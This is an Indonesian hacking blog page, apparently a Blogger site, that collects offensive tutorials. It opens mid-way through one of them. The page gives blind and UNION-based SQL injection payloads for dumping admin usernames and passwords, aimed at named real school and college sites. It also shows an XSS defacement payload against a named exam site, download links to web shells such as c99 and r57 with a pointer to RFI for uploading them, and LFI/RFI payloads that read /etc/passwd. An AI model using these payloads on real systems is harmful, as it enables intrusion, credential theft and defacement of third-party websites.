true,lalu kita tambahkan..<br /><br />www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,65)<br /><br />www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,66)<br /><br />www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,67)<br /><br />dst.. sampe dpet yg true..<br /><br />ternyata yg true ngumpet di value 77<br /><br />www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,77)<br /><br /><br />lanjutin trus langkah2na..<br /><br />cari value k 3 user..<br /><br />www.smanti.com/berita.php?id=5 and mid(user(),1,3)=CHAR(83,77,65)<br /><br />eh langsung ktemu..hehehe..<br /><br />lanjut value k 4..<br /><br />www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,65)<br /><br /><br />www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,66)<br /><br /><br />www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,67)<br /><br />ternyata ktemu di value 78..<br /><br />www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,78)<br /><br />lanjut trus aja...<br /><br />cape gw..<br /><br /><br />pokoknya..setelah dapet smua..kita convert char yang tadi di ke ascii table<br /><br />www.piclist.com/techref/ascii.htm<br /><br />stelah d convert,ternyata 83 77 65 78 tuh d ascii adalah SMAN<br /><br />nah udah hampir ktebak user name nya..kerjain ndiri y..okey<br /><br />nah..gmana kalo mw dapet password na?<br /><br />kita rubah value<br />user() menjadi database() dan ulangi tahap2 diatas hingga mendapat semua value yang true..<br /><br />jadi<br /><br /><br />www.smanti.com/berita.php?id=5 and mid(database(),1,1)=CHAR(65)<br /><br />cari lagi..sama kayak cari user tadi..harus sabar..<br /><br />ulangi sampai dapat true ..<br /><br />tambain value na..wkwkwkw..<br /><br />dan rubah value database() untuk mencari value lainnya..<br /><br />hingga mendapat admin password dan db password<br />.<br />metode blind sql injection seperti ini membutuhkan kesabaran dan ketelitian attacker untuk mendapatkan value yg tepat..(true)<br /><br />akan tetapi metode ini hingga sekarang cukup efektif untuk web yang telah menfilter celah sql injection...hehehe...<br /><br />Sumber : Hacker Newbie </div>

Blind SQL Injection

Ane akan mencoba menjelaskan semudah mungkin tentang Blind SQL Injection yang ane anggap rumit banget... Bukannya sok ngajarin atau apalah, ...

Baca selengkapnya »

Cara Deface Website Menggunakan Teknik XSS Vulnerability

<div dir="ltr" style="text-align: left;" trbidi="on">Udah lama ngga posting tentang tutor defacing website hehee, Sekarang saya akan sempatkan membahas tentang <u>Cyber Gravity</u> lagi nih... yaitu Cara Deface Website Menggunakan Teknik XSS Vulnerability.<br /><br />Sebelumnya udah pada tau belum apa itu <b>XSS Vulnerability?</b> XSS Vulnerability adalah suatu cara memasukan code/script HTML kedalam suatu website dan dijalankan melalui browser di client. Ok deh, Langsung aja kita bahas bersama Cara Deface Website Menggunakan Teknik XSS Vulnerability ini !<br /><br /><b>1).</b> Pertama, Masukan Dorknya :<br /> <br /><blockquote class="tr_bq">inurl:"/showcatrows.php?CategoryID="</blockquote><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgMhCZjCOLkZGjfAkX1nZM69726Ov9EVCf-9dX5_f0MsHtLtbJ1Lhe4nwp9D8F4enHfauc502vCBIxuGV1tT93DIcCGjCloFNhagIWgnLelhoz8s02Qy0AkC0TdhCehOMntqqPNndcp48a/s1600/asasa.bmp" style="margin-left: 1em; margin-right: 1em;"><img alt="http://cirebon-cyber4rt.blogspot.com/2012/06/cara-deface-website-menggunakan-teknik.html" border="0" height="178" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgMhCZjCOLkZGjfAkX1nZM69726Ov9EVCf-9dX5_f0MsHtLtbJ1Lhe4nwp9D8F4enHfauc502vCBIxuGV1tT93DIcCGjCloFNhagIWgnLelhoz8s02Qy0AkC0TdhCehOMntqqPNndcp48a/s320/asasa.bmp" title="Cara Deface Website Menggunakan Teknik XSS Vulnerability" width="320" /></a></div><br /><b>2)</b>. Kalo sudah, Pilih salah satu web yang akan kita deface.<br /><br /><blockquote class="tr_bq">Contoh : saya pakai web ini <a href="http://www.examsolutions.co.uk/maths-revision-papers/showcatrows.php?CategoryID=13" target="_blank">http://www.examsolutions.co.uk/...?CategoryID=13</a></blockquote><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQtmS2h7sQ8SYSmfEDpNyl2ay6DMqKLBg6oGB9H1O-AVwJLw6mDHRz4U8LHbcILX83IiotHDPJIUr_96_lrTcIqOoRKIWVPdTtssbKIQwOvyULIZLbr9LdtIS-co3v9lOb1EkgUsIsJDgO/s1600/assadadsa.bmp" style="margin-left: 1em; margin-right: 1em;"><img alt="http://cirebon-cyber4rt.blogspot.com/2012/06/cara-deface-website-menggunakan-teknik.html" border="0" height="182" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQtmS2h7sQ8SYSmfEDpNyl2ay6DMqKLBg6oGB9H1O-AVwJLw6mDHRz4U8LHbcILX83IiotHDPJIUr_96_lrTcIqOoRKIWVPdTtssbKIQwOvyULIZLbr9LdtIS-co3v9lOb1EkgUsIsJDgO/s320/assadadsa.bmp" title="Cara Deface Website Menggunakan Teknik XSS Vulnerability" width="320" /></a></div><br /><b>3).</b> Jika sudah masuk ke halaman web target, kita modifikasi sedikit URL web target dengan menambahkan tanda <span style="color: lime;">"</span> dan <span style="color: lime;">></span> setelah angka, tepatnya pada akhir URL. Lalu tambahkan kode HTML deface kita.<br /><br /><blockquote class="tr_bq">Contoh : <a href="http://www.examsolutions.co.uk/maths-revision-papers/showcatrows.php?CategoryID=13" target="_blank">http://www.examsolutions.co.uk/...?CategoryID=13</a>"><marquee><h1>Hacked by Cirebon-Cyber4rt</h1></marquee></blockquote><br /><b>4).</b> Kemudian tekan Enter.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg87L9YGmRMGMv2i_zHj2vRGIsO9F-KnxxZMKrhZHOUWhhYXXMp_2WQNJXRkPo5bjlvQuwICv4WwCwV1Tv0mpeubCWFzkp2XyhkPLdTThcY2gRDWe2yzS_TdpM_4_1fwynl7yrevOuVnHzO/s1600/adsdas.bmp" style="margin-left: 1em; margin-right: 1em;"><img alt="http://cirebon-cyber4rt.blogspot.com/2012/06/cara-deface-website-menggunakan-teknik.html" border="0" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg87L9YGmRMGMv2i_zHj2vRGIsO9F-KnxxZMKrhZHOUWhhYXXMp_2WQNJXRkPo5bjlvQuwICv4WwCwV1Tv0mpeubCWFzkp2XyhkPLdTThcY2gRDWe2yzS_TdpM_4_1fwynl7yrevOuVnHzO/s320/adsdas.bmp" title="Cara Deface Website Menggunakan Teknik XSS Vulnerability" width="320" /></a></div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;"><b>5).</b> Selesai, Website sudah berhasil kita deface :D</div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;">Triknya memang cukup simpel, dimana kita memanfaatkan celah keamanan pada XSS sebuah website dengan memasukan sebuah code/script HTML.</div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;">Sekian tutorial deface website kali ini dari saya, semoga artikel tentang Cara Deface Website Menggunakan Teknik XSS Vulnerability ini dapat bermanfaat bagi sobat.</div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;">Source: <a href="http://hacker-newbie.org/showthread.php?tid=13253" target="_blank">Hacker Newbie</a></div></div>

Cara Deface Website Menggunakan Teknik XSS Vulnerability

Udah lama ngga posting tentang tutor defacing website hehee, Sekarang saya akan sempatkan membahas tentang Cyber Gravity lagi nih... yaitu ...

Baca selengkapnya »

Apa itu Web Shell ?

<div dir="ltr" style="text-align: left;" trbidi="on">Dalam artikel saya kali ini, saya akan menerangkan sedikit tentang apa itu Web Shell. Sebenarnya saya sudah sering dengar hal ini sejak dulu, tapi baru sekarang saya mempelajarinya, dan baru sempat posting saat ini.<br /><br />Web Shell, seperti namanya yaitu Shell yang berada dalam Web. Web Shell ini adalah sekumpulan script, yang dapat mengeksekusi perintah shell. Seperti yang terkenal saat ini adalah C99, r57, bypass, dan masih banyak lagi.<br /><br />Untuk setiap web shell akan berbeda-beda, sesuai dengan Web Server yang dipakai. Misal jika server menggunakan Apache (biasanya PHP), maka webShell dalam berntuk PHP Script, begitu pula dengan ASP, PERL, CGI, dll.<br /><br />Kali ini saya tidak akan menunjukan, bagaimana cara memasukan webShell tersebut ke server yang mau dihack. Saya disini hanya akan mencobanya pada server sendiri, dan untuk melihat, seberapa besarkah efek yang ditimbulkan C99 ini. <img alt=":)" class="wp-smiley" src="http://s0.wp.com/wp-includes/images/smilies/icon_smile.gif?m=1129645325g" /> <br />Jika anda tertarik untuk bisa mengUpload webShell ini pada server korban, maka anda bisa menggunakan tehnik RFI ( Remote File Inclusion), yang tentunya anda tinggal mencari saja tutorialnya di Google.<br />Tested Web Shell,<br /><ul><li><a href="http://adf.ly/J6gCI" target="_blank">b374k</a></li><li><a href="http://adf.ly/J6gMw" target="_blank">dQ99-shell</a></li><li><a href="http://www.mediafire.com/?bdg6d9dmq3pdl8j">c9<span id="goog_2105813642"></span><span id="goog_2105813643"></span>9</a></li><li><a href="http://www.mediafire.com/?z5moqzmwla8qd83">r57</a></li><li><a href="http://www.mediafire.com/?264amuhgihzx1e6">phpShell</a></li><li><a href="http://www.mediafire.com/?zxrky71l69n3l6c">itsecteam-shell</a></li><li><a href="http://www.mediafire.com/?e3av5qj0zwiw4ch">Bypass</a></li><li><a href="http://www.mediafire.com/?rz787zzb64pb64p">safeOver</a></li><li><a href="http://www.mediafire.com/?264amuhgihzx1e6">phpShell</a></li><li><a href="http://www.mediafire.com/?zxrky71l69n3l6c">itsecteam-shell</a></li></ul>Un-Tested Web Shell,<br /><ul><li><a href="http://www.mediafire.com/?psce2pob5lxlkp6">Tyrag-Bypass</a></li><li><a href="http://www.mediafire.com/?sbzwq7yh1iyk759">c100</a></li><li><a href="http://www.mediafire.com/?7x2259g9c9k6dyn">ASPx</a></li><li><a href="http://www.mediafire.com/?9xt1btiwt5d8t23">CMD-aspshell</a></li><li><a href="http://www.mediafire.com/?rvik3u662ealkn1">CWShell-Dumper</a></li><li><a href="http://www.mediafire.com/?271113v16086bdt">CGI-Shell</a></li></ul><div style="text-align: left;">Sesudah itu taruh file tersebut dalam Direktori Web Server anda dalam format PHP/ASP/CGI, sesuaikan dengan tipe webShell. Dan kunjungi melalui webBrowser, misalnya seperti berikut.</div><pre>http://www.sitetarget.com/c99.php</pre><pre> </pre><div style="text-align: left;">Berikut beberapa screen shoot dari web shell tersebut,</div><div style="text-align: left;"><br /></div><div style="text-align: center;"><a href="http://lebaksono.files.wordpress.com/2010/12/05.jpg"><img alt="" class="aligncenter size-full wp-image-1552" src="http://lebaksono.files.wordpress.com/2010/12/05.jpg?w=595" title="05" /></a><b> </b></div><div style="text-align: center;"><b>[ C99 from Russia ]</b></div><div style="text-align: center;"><a href="http://lebaksono.files.wordpress.com/2010/12/01.jpg"><img alt="" class="aligncenter size-full wp-image-1553" src="http://lebaksono.files.wordpress.com/2010/12/01.jpg?w=595" title="01" /></a><b> </b></div><div style="text-align: center;"><b>[ ANI SHELL from India ]</b></div><div style="text-align: center;"><a href="http://lebaksono.files.wordpress.com/2010/12/03.jpg"><img alt="" class="aligncenter size-full wp-image-1554" src="http://lebaksono.files.wordpress.com/2010/12/03.jpg?w=595" title="03" /></a><b> </b></div><div style="text-align: center;"><b>[ B374k 2.1 from Indonesia ]</b></div><div style="text-align: center;"><a href="http://lebaksono.files.wordpress.com/2010/12/08.jpg"><img alt="" class="aligncenter size-full wp-image-1555" src="http://lebaksono.files.wordpress.com/2010/12/08.jpg?w=595" title="08" /></a><b> </b></div><div style="text-align: center;"><b>[ ZACO WebShell support POST Method ]</b></div></div>

Apa itu Web Shell ?

Dalam artikel saya kali ini, saya akan menerangkan sedikit tentang apa itu Web Shell. Sebenarnya saya sudah sering dengar hal ini sejak du...

Baca selengkapnya »

Tutor singkat RFI & LFI

<div dir="ltr" style="text-align: left;" trbidi="on">Buat yg belum tau aja yhaa... klo yg udh jago, mending ga ush di baca... drpd buang2 waktu :tongue:<br /><br />Sebelumnya apa sih LFI dan RFI itu??<br /><br />LFI (Local File Inclusion) adalah sebuah lubang pada site di mana attacker bisa mengakses semua file di dalam server dengan hanya melalui URL.<br />RFI (Remote File Inclusion) adalah sebuah lubang dimana site mengizinkan attacker meng-include-kan file dari luar server.<br /> <br /><u>Penjelasan</u><br />fungsi-fungsi yang dapat menyebabkan LFI/RFI:<br /><br /><br /><div class="codeblock"><div class="title">Code:<br /></div><div class="body" dir="ltr"><code>include();<br />include_once();<br />require();<br />require_once();</code></div></div><br />Dengan syarat pada konfigurasi php di server:<br />allow_url_include = on<br />allow_url_fopen = on<br />magic_quotes_gpc = off<br /><br />contoh:<br />misalkan kita punya file index.php dengan content kodenya seperti ini,<br /><br /><br /><div class="codeblock"><div class="title">Code:<br /></div><div class="body" dir="ltr"><code><?php<br />  include "../$_GET[imagefile]";<br />  ?></code></div></div><br />misal $imagefile=image.php<br />mungkin di url akan terlihat seperti ini bentuknya<br /><br /><div class="codeblock"><div class="title">Code:<br /></div><div class="body" dir="ltr"><code>http://www.[target].com/index.php?imagefile=image.php</code></div></div>maka script ini akan menampilkan halaman image.php.<br /><br /><br />nah disini attacker akan dapat melakukan LFI karena variable imagefile di include begitu saja tanpa menggunakan filter.<br />misalnya attacker ingin mengakses file passwd yang ada pada server, maka dia akan mencoba memasukan seperti ini ../../../../../../../../../etc/passwd << dengan jumlah "../" itu tergantung dari kedalaman folder tempat file index.php tersebut.. dengan begitu isi file passwd akan ditampilkan di browser. kita bisa menggunakan metode menebak struktur folder dalam website target :lol:<br /><br />tapi seandainya terdapat error seperti di bawah ini:<br /><br />Warning: main(../../../../../../../../../etc/passwd.php) [function.main]: failed to open stream: No such file or directory in /their/web/root/index.php on line 2<br />liat pada passwd ternyata dia ditambah dengan extensi ".php" berarti code yang digunakan untuk include adalah seperti ini<br /><br /><div class="codeblock"><div class="title">Code:<br /></div><div class="body" dir="ltr"><code>Code:<br /><br />  <?php<br />  include($_GET[imagefile].".php");<br />  ?></code></div></div><br />nah untuk dapat mengelabui script tersebut kita bisa menggunakan (dengan syarat magic_quotes_gpc = off) jadi dibelakang /etc/passwd kita tambahkan seperti<br /><br />http://www.[target].com/index.php?imagefile=../../../../../../../../../etc/passwd<br /><br />lalu untuk apa ? yaitu untuk menghilangkan karakter apapun setelah passwd.<br />* ini disebut null injection.<br /><br />Nah kita sudah menemukan bug LFI pada website target, sekarang kita coba cari bug RFI dengan menambahkan link file remote (dari luar website) pada variable imagefile. misalnya:<br /><br />http://www.[target].com/index.php?imagefile=http://www.[remote].com/evil.txt<br /><br />dengan file evil.txt misal berisi "hacked by n4is3n"<br /><br />jika ternyata di browser menampilkan kalimat tersebut berarti website tersebut vulner terhadap bug RFI juga.<br /><br /><br />Pencegahan<br />Nah sekarang saatnya untuk pencegahan kedua bug tersebut, yaitu<br />1. Memvalidasi variable.<br />2. Mengkonfigurasi kembali settingan php pada server website Anda.<br />allow_url_include = off<br />allow_url_fopen = off<br />magic_quotes_gpc = on<br />3. pada include mungkin bisa ditambahkan "./"<br />jadinya seperti ini,<br /><br /><div class="codeblock"><div class="title"></div><div class="body" dir="ltr"><code>Code:<br />include("./"$_GET[imagefile].".php");</code></div></div><br />maksudnya dengan seperti itu, saat kita mengakses file dari luar server maka hasilnya akan error karena saat pemrosesan setiap file yang masuk ke variable page akan ditambah ./ di depannya.<br /><br />http://www.[target].com/index.php?imagefile=http://www.[remote].com/evil.txt<br /><br />dengan seperti ini server atau website yang diinject akan mencari file http://www.[remote].com/evil.txt dan pastinya akan menyebabkan server menampilkan error bahwa tidak ditemukannya file tsb.<br /><br />Semoga tutor sederhana dan sangat awam ini (Maklum, yg nulis jg msh awam) bermanfaat.<br /><br />Sumber: <a href="http://hacker-newbie.org/showthread.php?tid=162" target="_blank">Hacker Newbie</a> </div>

Tutor singkat RFI & LFI

Buat yg belum tau aja yhaa... klo yg udh jago, mending ga ush di baca... drpd buang2 waktu :tongue: Sebelumnya apa sih LFI dan RFI itu?? LFI...

Baca selengkapnya »

Deface Palsu via SQL Injection

<div dir="ltr" style="text-align: left;" trbidi="on">langsung aja yahh..<br />deface palsu via sql injection?<br />maksudnya?<br />buat yg master,jgn d baca yahhh...<br />cm niat utk share kok...hhe ..<br /><br />pertama,jadi yg kita lakuakn cm deface palsu...deface yg hanya bs d baca dr sisi client,seperti XSS..<br />gmn crnya ?<br />lnjut ..<br /><br />1.Siapin target ,mau SQL versi 4 atau versi 5 jg boleh.<br />kl lupa nihh<br /><br /><div class="codeblock"><div class="title">Code:<br /></div><div class="body" dir="ltr"><code>http://hacker-newbie.org/showthread.php?tid=97</code></div></div><br />2.nah misal ud dpt target nihh..<br /><div class="codeblock"><div class="title">Code:<br /></div><div class="body" dir="ltr"><code>http://www.stmikpontianak.ac.id/news.php?id=-70 union select 1,2,3,4,5,6,7,8,9--</code></div></div><br />3.cek versinya...<br /><div class="codeblock"><div class="title">Code:<br /></div><div class="body" dir="ltr"><code>http://www.stmikpontianak.ac.id/news.php?id=-70 union select 1,2,@@version,4,5,6,7,8,9--</code></div></div><br />eh ternyata versi 4..<br />drpd cape ngeblind..<br />yaudah buat gaya2an..deface palsu ajaa..<br />kalian tw kan yg ngerubah ascii jd hex code?<br />kl bingung,<br />buka ini<br /><div class="codeblock"><div class="title">Code:<br /></div><div class="body" dir="ltr"><code>http://dieq41.com/tools/text.html</code></div><div class="body" dir="ltr"><code> </code></div></div>nah coba buat script deface,misal<br /><div class="codeblock"><div class="title">Code:<br /></div><div class="body" dir="ltr"><code><h1>hacked by me</h1></code></div><div class="body" dir="ltr"><code> </code></div></div>masukin ke bagian ASCII yg ada d web dieq41..<br /> trus kl ud d masukin..<br />liat bagian hexadecimal,bakal muncul:<br /><br /><div class="codeblock"><div class="title">Code:<br /></div><div class="body" dir="ltr"><code>3C68313E6861636B6564206279206D653C2F68313E</code></div></div><br />nah kode d atas tuh kodehasil convert dr ascii ke hex..<br /><br />nah,,skrg yg kode 3C68313E6861636B6564206279206D653C2F68313E ditambah 0x d depannya ...jadi<br /><br /><div class="codeblock"><div class="title">Code:<br /></div><div class="body" dir="ltr"><code>0x3C68313E6861636B6564206279206D653C2F68313E</code></div></div><br />oke,coba masukin d angka 3 ,yg script hex nyaa..<br />Code:<br /><div class="codeblock"><div class="body" dir="ltr"><code>http://www.stmikpontianak.ac.id/news.php?id=-70 union select 1,2,0x3C68313E6861636B6564206279206D653C2F68313E,4,5,6,7,8,9--</code></div></div><br />ew.kok ada hacked by me?<br />hhe..itu tandanya udah berhasil sob..<br /><br />makanya ak bilang ini cm client aja..<br />ask : kl mau deface bneran?<br />yaudah gawei dewek ..kan ad tutor sql injectionnya tuh..<br /><br />ok sob smua,makasih2.<br /><br />Sumber:: <a href="http://hacker-newbie.org/showthread.php?tid=306" target="_blank">Hacker Newbie </a></div>

Deface Palsu via SQL Injection

langsung aja yahh.. deface palsu via sql injection? maksudnya? buat yg master,jgn d baca yahhh... cm niat utk share kok...hhe .. pertama,jad...

Baca selengkapnya »

Cara Hacking Website Dengan Teknik SQL Injection

<div dir="ltr" style="text-align: left;" trbidi="on"><span style="background-color: black; font-family: inherit;"><span style="line-height: 18px; text-align: left;"><span style="color: lime;">Pengertian SQL Injection</span><span style="color: white;">, </span></span><span style="color: white; line-height: 18px; text-align: left;">SQL Injection adalah sebuah aksi hacking yang dilakukan diaplikasi client dengan cara memodifikasi perintah SQL yang ada dimemori aplikasi client dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.</span></span><br /><br /><div><div style="text-align: left;"><span style="color: white;"><span style="font-family: inherit; line-height: 18px;"><br /></span></span></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQsgzewQ_nKBX15A9RitzTK8oHifRG7hDmCcDioeJUXtBaQKgGmPCK8lZ0IkWWk6A3RHexLXuLSlcrapef3B8E7j-lq1nPRsXANq6dZlT6swW3jXEYNomO7d0x_H_JIlhRTfGZsfv_X1yV/s1600/download+(1).jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQsgzewQ_nKBX15A9RitzTK8oHifRG7hDmCcDioeJUXtBaQKgGmPCK8lZ0IkWWk6A3RHexLXuLSlcrapef3B8E7j-lq1nPRsXANq6dZlT6swW3jXEYNomO7d0x_H_JIlhRTfGZsfv_X1yV/s1600/download+(1).jpg" /></a></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div><span style="background-color: black; font-family: inherit;"><span style="line-height: 18px; text-align: left;"><span style="color: white;">Yang perlu diketahui sebelum melakukan SQL Injection pada MySQL:</span></span><br style="line-height: 18px; text-align: left;" /><span style="color: white; line-height: 18px; text-align: left;">karakter: ' atau -</span><br style="line-height: 18px; text-align: left;" /><span style="color: white; line-height: 18px; text-align: left;">comments: /* atau --</span><br style="line-height: 18px; text-align: left;" /><span style="color: white; line-height: 18px; text-align: left;">information_schema untuk versi: MySQL versi 5.x , tidak support untuk MySQL versi 4.x</span><span style="color: white;"><span style="line-height: 18px; text-align: left;"><br /></span></span></span></div><div><span style="color: white;"><span style="background-color: black; font-family: inherit; line-height: 18px; text-align: left;"><br /></span></span></div><div><span style="color: lime;"><span style="background-color: black; font-family: inherit; line-height: 18px; text-align: left;"><b>[ Step 1 ]</b></span></span></div><div><ul><li><span style="color: white;"><span style="background-color: black; font-family: inherit; line-height: 18px;"><span style="text-align: left;">Carilah target</span><br style="text-align: left;" /><span style="text-align: left;">Misal: [site]/berita.php?id=100</span><br style="text-align: left;" /><br style="text-align: left;" /><span style="text-align: left;">Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.</span><br style="text-align: left;" /><span style="text-align: left;">contoh:</span><br style="text-align: left;" /><span style="text-align: left;">[site]/berita.php?id=100' atau</span><br style="text-align: left;" /><span style="text-align: left;">[site]/berita.php?id=-100</span><br style="text-align: left;" /><span style="text-align: left;">Sehingga muncul pesan error seperti berikut [ masih banyak lagi ]</span></span></span></li></ul><div style="text-align: left;"><span style="color: lime;"><span style="background-color: black; font-family: inherit; line-height: 18px;"><b>[ Step 2 ]</b></span></span></div></div><div style="text-align: left;"><ul><li><span style="color: white;"><span style="background-color: black; font-family: inherit; line-height: 18px;">Mencari dan menghitung jumlah table yang ada dalam databasenya...<br />gunakan perintah: order by<br /><br />Contoh:<br /><br />[site]/berita.php?id=-100+order+by+1-- atau<br />[site]/berita.php?id=-100+order+by+1/*<br /><br />Ceklah secara step by step (satupersatu)...<br />Misal:<br /><br />[site]/berita.php?id=-100+order+by+1--<br />[site]/berita.php?id=-100+order+by+2--<br />[site]/berita.php?id=-100+order+by+3--<br />[site]/berita.php?id=-100+order+by+4--<br /><br />Sehingga muncul error atau hilang pesan error...<br />Misal: [site]/berita.php?id=-100+order+by+9--<br /><br />Berarti yang kita ambil adalah sampai angka 8<br />Menjadi [site]/berita.php?id=-100+order+by+8--</span></span></li></ul><div><span style="color: lime;"><span style="background-color: black; font-family: inherit; line-height: 18px;"><b>[ Step 3 ]</b></span></span></div><div><ul><li><span style="color: white;"><span style="background-color: black; font-family: inherit; line-height: 18px;">untuk mengeluarkan angka berapa yang muncul gunakan perintah union<br />karena tadi error sampai angka 9<br />maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--<br /><br />ok seumpama yg keluar angka 5<br /><br />gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi<br />misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau<br />[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--<br /><br />Lihat versi yang digunakan se'umpama versi 4 tinggalkan saja karena dalam versi 4 ini kita harus menebak sendiri table dan column yang ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..<br /><br />Untuk versi 5 berarti anda beruntung tak perlu menebak table dan column seperti versi 4 karena di versi 5 ini bisa menggunakan perintah From+Information_schema..</span></span></li></ul><div><span style="color: lime;"><span style="background-color: black; font-family: inherit; line-height: 18px;"><b>[ Step 4 ]</b></span></span></div></div><div><ul><li><span style="color: white;"><span style="background-color: black; font-family: inherit; line-height: 18px;">Untuk menampilkan table yang ada pada web tersebut adalah<br />perintah table_name >>> dimasukan pada angka yangg keluar tadi<br />perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir<br /><br />Code:<br /><br />[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--<br /><br />Se'umpama table yang muncul adalah "admin"</span></span></li></ul><div><span style="color: lime;"><span style="background-color: black; font-family: inherit; line-height: 18px;"><b>[ Step 5 ]</b></span></span></div></div><div><ul><li><span style="color: white;"><span style="background-color: black; font-family: inherit; line-height: 18px;">untuk menampilkan semua isi dari table tersebut adalah<br />perintah group_concat(table_name) >>> dimasukan pada angka yang keluar tadi<br />perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir<br /><br />[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema. ​tables+where+table_schema=database()--</span></span></li></ul><div><span style="color: lime;"><span style="background-color: black; font-family: inherit; line-height: 18px;"><b>[ Step 6 ]</b></span></span></div></div><div><ul><li><span style="background-color: black; line-height: 18px;"><span style="color: white; font-family: inherit;">Perintah group_concat(column_name) >>> dimasukan pada angka yang keluar tadi<br />perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir<br /><br />[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema ​.columns+where+table_name=0xhexa--<br /><br />Pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya<br />Website yg digunakan untuk konversi :<br /><br /><a href="http://www.v3n0m.net/ascii.htm" style="text-decoration: none;" target="_blank">http://www.v3n0m.net/ascii.htm</a><br /><br />Contoh kata yang ingin dikonversi yaitu admin maka akan menjadi 61646D696E<br /><br />[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema ​.columns+where+table_name=0x61646D696E--</span></span></li></ul><div><span style="color: lime;"><span style="background-color: black; font-family: inherit; line-height: 18px;"><b>[ Step 7 ]</b></span></span></div></div><div><ul><li><span style="color: white;"><span style="background-color: black; font-family: inherit; line-height: 18px;">Memunculkan apa yang tadi telah dikeluarkan dari table yaitu dengan cara<br /><br />perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi<br />perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir<br /><br />Contoh :<br /><br />[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--<br /><br />Contoh kata yang keluar adalah id,username,password<br /><br />Contoh :<br /><br />[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--</span></span></li></ul><div><span style="color: lime;"><span style="background-color: black; font-family: inherit; line-height: 18px;"><b>[ Step 8 ]</b></span></span></div></div><div><ul><li><span style="color: white;"><span style="background-color: black; font-family: inherit; line-height: 18px;">Tahap terakhir mencari halaman admin atau login.</span></span></li></ul><div><span style="background-color: black; font-family: inherit; line-height: 18px;"><span style="color: white;">Sekian postingan saya kali ini tentang Cara Hacking Website Dengan Teknik SQL Injection</span><span style="color: white;">, tutorial hacking yang lain akan menyusul, Jadi mampir terus kesini ya :D</span></span><br /><span style="background-color: black; color: white; font-family: inherit; line-height: 18px;"><br />Source: </span><a href="http://hacker-newbie.org/showthread.php?tid=97" style="background-color: black; font-family: inherit; line-height: 18px;" target="_blank">Hacker Newbie</a></div></div></div></div></div>

Cara Hacking Website Dengan Teknik SQL Injection

Pengertian SQL Injection ,  SQL Injection adalah sebuah aksi hacking yang dilakukan diaplikasi client dengan cara memodifikasi perintah SQ...

Baca selengkapnya »